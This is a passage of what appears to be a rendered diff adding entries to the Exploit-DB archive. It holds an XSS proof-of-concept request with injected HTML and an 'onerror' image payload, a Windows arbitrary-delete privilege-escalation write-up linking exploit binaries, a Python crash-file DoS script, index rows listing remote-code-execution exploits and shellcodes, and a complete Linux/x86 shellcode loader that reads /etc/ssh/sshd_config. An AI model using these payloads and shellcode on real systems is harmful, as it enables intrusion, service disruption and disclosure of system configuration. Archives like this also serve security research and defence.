Upgrade-Insecure-Requests: 1
-----------------------------180989082911182658591910516947
Content-Disposition: form-data; name="site_name"
"><h1>Ismail Tasdelen</h1>
-----------------------------180989082911182658591910516947
Content-Disposition: form-data; name="site_title"
"><h1>Ismail Tasdelen</h1>
-----------------------------180989082911182658591910516947
Content-Disposition: form-data; name="keywords"
Multilanguage ,Codeigniter Multilanguage Script,"><h1>Ismail Tasdelen</h1>
-----------------------------180989082911182658591910516947
Content-Disposition: form-data; name="description"
"><h1>Ismail Tasdelen</h1>
-----------------------------180989082911182658591910516947
Content-Disposition: form-data; name="photo1"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg

17
exploits/windows/local/45675.md Normal file
View file

@ -0,0 +1,17 @@
Bug description:
`RpcDSSMoveFromSharedFile(handle,L"token",L"c:\\blah1\\pci.sys");`
This function exposed over alpc, has a arbitrary delete vuln.
Hitting the timing was pretty annoying. But my PoC will keep rerunning until c:\windows\system32\drivers\pci.sys is deleted.
I believe it's impossible to hit the timing on a single core VM. I was able to trigger it using 4 cores on my VM. (Sadly I wasn't able to use OPLOCKS with this particular bug)
Root cause is basically just a delete without impersonation because of an early revert to self. Should be straight forward to fix it...
Exploitation wise... you either try to trigger DLL hijacking issues in 3rd party software.. or delete temp files used by a system service in c:\windows\temp and hijack them and hopefully do some evil stuff.
EDB Note ~ Source: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-1.rar
EDB Note ~ Binary: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-2.exe

27
exploits/windows_x86/dos/45670.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: ADULT FILTER 1.0 - Denial of Service (PoC)
# Date: 2018-10-28
# Exploit Author: Beren Kuday GÃRÃœN
# Vendor Homepage: http://www.armcode.com/adult-filter/
# Software Link: http://www.armcode.com/downloads/adult-filter.exe
# Version: 1.0 (Build 2007-Mar-12)
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python3 exploit script, it will create a new
# file with the name "boom_for_Adult_Filter.txt". Copy the content of the
# new file "boom_for_Adult_Filter.txt". Now start the program. When you
# open the program, select 'Options >> Black Domain List ...' from the
# menu item. In the window that opens, enter the text in the file you
# created with python3 script the 'Add the domain list' section.
# Press the 'Add' button and then press the 'OK' button.
# And see a crash!
buffer = "A" * 4500
try:
file = open("boom_for_Adult_Filter.txt","w")
file.write(buffer)
file.close()
print("[*] Ready for Denial of Service")
except:
print("[*] Error: Failed to create file")

19
files_exploits.csv
View file

@ -6156,6 +6156,7 @@ id,file,description,date,author,type,platform,port
45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows,
45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10048,6 +10049,7 @@ id,file,description,date,author,type,platform,port
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -10296,7 +10298,7 @@ id,file,description,date,author,type,platform,port
730,exploits/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution",2004-12-28,ShredderSub7,remote,windows,
733,exploits/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,remote,windows,42
734,exploits/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,remote,windows,139
745,exploits/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000
745,exploits/multiple/remote/745.pl,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000
746,exploits/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,remote,multiple,10000
750,exploits/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,remote,windows,6101
753,exploits/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,remote,windows,
@ -16888,6 +16890,7 @@ id,file,description,date,author,type,platform,port
45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware,
45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux,
45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40177,6 +40180,14 @@ id,file,description,date,author,type,platform,port
45659,exploits/php/webapps/45659.txt,"SIM-PKH 2.4.1 - Arbitrary File Upload",2018-10-23,"Ihsan Sencan",webapps,php,
45661,exploits/windows/webapps/45661.txt,"ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection",2018-10-23,hyp3rlinx,webapps,windows,
45662,exploits/php/webapps/45662.txt,"School ERP Pro+Responsive 1.0 - Arbitrary File Download",2018-10-23,"Ihsan Sencan",webapps,php,
45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,
45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,80
45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,80
45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,80
45666,exploits/php/webapps/45666.txt,"SG ERP 1.0 - 'info' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php,80
45667,exploits/php/webapps/45667.txt,"Fifa Master XLS 2.3.2 - 'usw' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php,
45668,exploits/aspx/webapps/45668.txt,"Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting",2018-10-24,"Dino Barlattani",webapps,aspx,
45672,exploits/php/webapps/45672.txt,"LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting",2018-10-24,"Ismail Tasdelen",webapps,php,
45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,
45676,exploits/hardware/webapps/45676.md,"D-Link Routers - Command Injection",2018-10-12,"Blazej Adamczyk",webapps,hardware,
45677,exploits/hardware/webapps/45677.md,"D-Link Routers - Plaintext Password",2018-10-12,"Blazej Adamczyk",webapps,hardware,
45678,exploits/hardware/webapps/45678.md,"D-Link Routers - Directory Traversal",2018-10-12,"Blazej Adamczyk",webapps,hardware,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -920,3 +920,4 @@ id,file,description,date,author,type,platform
45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm
45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86

1 id file description date author type platform
920 45495 shellcodes/arm/45495.c Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes) 2018-09-26 Ken Kitahara shellcode arm
921 45538 shellcodes/linux_x86/45538.txt Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes) 2018-10-08 Kartik Durg shellcode linux_x86
922 45541 shellcodes/linux_mips/45541.c Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes) 2018-10-08 cq674350529 shellcode linux_mips
923 45669 shellcodes/linux_x86/45669.c Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes 2018-10-24 Goutham Madhwaraj shellcode linux_x86

52
shellcodes/linux_x86/45669.c Normal file
View file

@ -0,0 +1,52 @@
/*
# Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
# Author: Goutham Madhwaraj
# Date: 2018-10-22
# Tested on: i686 GNU/Linux
# Shellcode Length: 44
# ShoutOut - BarrierSec
# gcc -fno-stack-protector -z execstack loader-bind.c -o
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 2f 63 61 74 push 0x7461632f
8048088: 68 2f 62 69 6e push 0x6e69622f
804808d: 89 e3 mov ebx,esp
804808f: 50 push eax
8048090: 68 6e 66 69 67 push 0x6769666e
8048095: 68 64 5f 63 6f push 0x6f635f64
804809a: 68 2f 73 73 68 push 0x6873732f
804809f: 68 2f 73 73 68 push 0x6873732f
80480a4: 68 2f 65 74 63 push 0x6374652f
80480a9: 89 e1 mov ecx,esp
80480ab: 6a 00 push 0x0
80480ad: 51 push ecx
80480ae: 53 push ebx
80480af: 89 e1 mov ecx,esp
80480b1: 50 push eax
80480b2: 89 e2 mov edx,esp
80480b4: b0 0b mov al,0xb
80480b6: cd 80 int 0x80
===============POC by Goutham Madhwaraj=========================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6e\x66\x69\x67\x68\x64\x5f\x63\x6f\x68\x2f\x73\x73\x68\x68\x2f\x73\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x6a\x00\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}